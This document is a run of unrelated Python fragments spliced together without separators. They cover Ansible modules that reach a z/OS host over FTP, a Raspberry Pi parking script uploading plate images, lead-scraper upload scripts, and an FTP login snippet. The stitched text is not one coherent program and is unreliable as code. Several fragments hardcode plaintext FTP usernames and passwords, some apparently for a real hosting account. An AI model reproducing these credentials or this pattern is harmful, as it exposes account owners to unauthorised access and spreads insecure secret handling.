def run_module(): module_args = dict( job_id=dict(type="str", required=False), job_name=dict(type="str", required=False), owner=dict(type="str", required=False), ddname=dict(type="str", required=False), ) module = AnsibleModule(argument_spec=module_args, supports_check_mode=True) job_id = module.params.get("job_id") job_name = module.params.get("job_name") owner = module.params.get("owner") ddname = module.params.get("ddname") if environ.get('FTP_SOCKS_PORT'): import socks import socket socks.set_default_proxy(socks.SOCKS5, "127.0.0.1", int(environ.get('FTP_SOCKS_PORT'))) socket.socket = socks.socksocket try: if environ.get('FTP_TLS_VERSION'): from ftplib import FTP_TLS import ssl cert_file_path = environ.get('FTP_TLS_CERT_FILE') if cert_file_path: if not path.isfile(cert_file_path): module.fail_json( msg="The TLS cartificate file not found: {0}".format( repr(cert_file_path)), **result) context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) context.load_verify_locations(cert_file_path) context.check_hostname = False ftp = FTP_TLS(context=context) else: ftp = FTP_TLS() tls_version = environ.get('FTP_TLS_VERSION') if tls_version == '1.2': ftp.ssl_version = ssl.PROTOCOL_TLSv1_2 else: ftp = FTP() ftp.connect(environ.get('FTP_HOST'), int(environ.get('FTP_PORT') or 21)) ftp.login(environ.get('FTP_USERID'), environ.get('FTP_PASSWORD')) ftp.sendcmd("site filetype=jes") ftp.set_pasv(True) if environ.get('FTP_TLS_VERSION'): ftp.prot_p() except Exception as e: module.fail_json( msg="An unexpected error occurred during FTP login: {0}".format( repr(e)), **result) if not job_id and not job_name and not owner: module.fail_json(msg="Please provide a job_id or job_name or owner") try: result = {} wait_time_s = 10 result["jobs"] = job_output(ftp, wait_time_s, job_id, owner, job_name, ddname) result["changed"] = False except Exception as e: module.fail_json(msg=repr(e)) module.exit_json(**result)
lprcode = "No Plate" lpr_filepath = '' ftp_file_case = '' # variables for image url compared_option = 0 # 0 - no, 1 - log table, 2 - ticket table compared_value = '' # compared, 1 - vehicle id , 2 -barcode while 1: relay_status = relay_status & (~DENYLED) bus.write_byte_data(I2C_ADDRESS, 0x09, relay_status) # GPIO.output(DENYLED, GPIO.LOW) # FTP if lpr_filepath != '': try: ftp = FTP_TLS('192.168.0.200') ftp.sendcmd('USER vlada') ftp.sendcmd('PASS raspberry2018') timestamp = "%04d%02d%02d" % (datetime.datetime.now().year, datetime.datetime.now().month, datetime.datetime.now().day) try: ftp.cwd('/PARKING_08_iz/' + timestamp) except Exception as ex: ftp.mkd('/PARKING_08_iz/' + timestamp) ftp.cwd('/PARKING_08_iz/' + timestamp) lpr_file = open(DIR_PATH + lpr_filepath, 'rb') print("To ftp: " + timestamp + '/' + ftp_file_case) ftp.storbinary('STOR ' + ftp_file_case, lpr_file) ftp.quit() ftp.close()
leads_with_keywords[current_url_number].append({'title':this_title}) leads_with_keywords[current_url_number].append({'url':this_url}) current_url_number+=1 break current_lead_number+=1 with open('out_lead.json', 'w') as outfile: json.dump(leads_with_keywords, outfile) exit ftp=FTP_TLS() ftp.set_debuglevel(2) ftp.connect('0000', 0000) ftp.sendcmd("USER user") ftp.sendcmd("PASS user") file = open('out_lead.json','rb') ftp.storbinary('STOR out_lead.json', file) file.close() ftp.close() os.remove("lead.json") os.remove("out_lead.json") # Because another file is created which is out_lead.json # Watchdog runs the clean_leads script again. # But because there is no lead.json because spider.py hasen't # It throws a missing file error. # Currently this is fine for now.
def run_module(): module_args = dict(commands=dict(type="raw", required=True, aliases=["command"]), ) module = AnsibleModule(argument_spec=module_args, supports_check_mode=True) result = dict(changed=False, ) commands = module.params['commands'] if environ.get('FTP_SOCKS_PORT'): import socks import socket socks.set_default_proxy(socks.SOCKS5, "127.0.0.1", int(environ.get('FTP_SOCKS_PORT'))) socket.socket = socks.socksocket try: if environ.get('FTP_TLS_VERSION'): from ftplib import FTP_TLS import ssl cert_file_path = environ.get('FTP_TLS_CERT_FILE') if cert_file_path: if not path.isfile(cert_file_path): module.fail_json( msg="Certification file not found: {0}".format( repr(cert_file_path)), **result) context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) context.load_verify_locations(cert_file_path) context.check_hostname = False ftp = FTP_TLS(context=context) else: ftp = FTP_TLS() tls_version = environ.get('FTP_TLS_VERSION') if tls_version == '1.2': ftp.ssl_version = ssl.PROTOCOL_TLSv1_2 else: ftp = FTP() ftp.connect(environ.get('FTP_HOST'), int(environ.get('FTP_PORT') or 21)) ftp.login(environ.get('FTP_USERID'), environ.get('FTP_PASSWORD')) ftp.sendcmd("site filetype=jes") ftp.set_pasv(True) if environ.get('FTP_TLS_VERSION'): ftp.prot_p() except Exception as e: module.fail_json( msg="An unexpected error occurred during FTP login: {0}".format( repr(e)), **result) try: result = run_tso_command(ftp, commands, module) ftp.quit() for cmd in result.get("output"): if cmd.get("rc") != 0: module.fail_json(msg='The TSO command "' + cmd.get("command", "") + '" execution failed.', **result) result["changed"] = True module.exit_json(**result) except Exception as e: ftp.quit() module.fail_json(msg="An unexpected error occurred: {0}".format( repr(e)), **result)
title = lead[0] #print url this_title = title["title"] this_url = url["url"] #print this_url leads_with_keywords[current_url_number] = [] leads_with_keywords[current_url_number].append( {'title': this_title}) leads_with_keywords[current_url_number].append( {'url': this_url}) current_url_number += 1 break current_lead_number += 1 with open('out2_lead.json', 'w') as outfile: json.dump(leads_with_keywords, outfile) exit ftp = FTP_TLS() ftp.set_debuglevel(2) ftp.connect('0000', 0000) ftp.sendcmd("USER user") ftp.sendcmd("PASS password") file = open('out2_lead.json', 'rb') ftp.storbinary('STOR out2_lead.json', file) file.close() ftp.close() os.remove("lead2.json") os.remove("out2_lead.json")
# ftp.login(user='******', passwd='MpV6dwCa') """Beget""" # # ftp = ftplib.FTP('klionp9p.beget.tech', timeout=10) # ftp.login(user='******', passwd='2zFh%Ek3') # GREEN = colorama.Fore.GREEN RESET = colorama.Fore.RESET YELLOW = colorama.Fore.LIGHTYELLOW_EX BLUE = colorama.Fore.LIGHTBLUE_EX # # print(ftp.connect()) # ftp.connect() # ftp.dir() formats = ['.txt', '.html', '.docx', '.htm'] from ftplib import FTP_TLS ftp=FTP_TLS() # ftp.set_debuglevel(2) ftp.connect('klionp9p.beget.tech', 21, timeout=100) ftp.sendcmd('USER klionp9p_lesson') ftp.sendcmd('PASS 3M1l&Mha') ftp.cwd('klionp9p.beget.tech') # ftp.dir() # ftp.retrlines('LIST')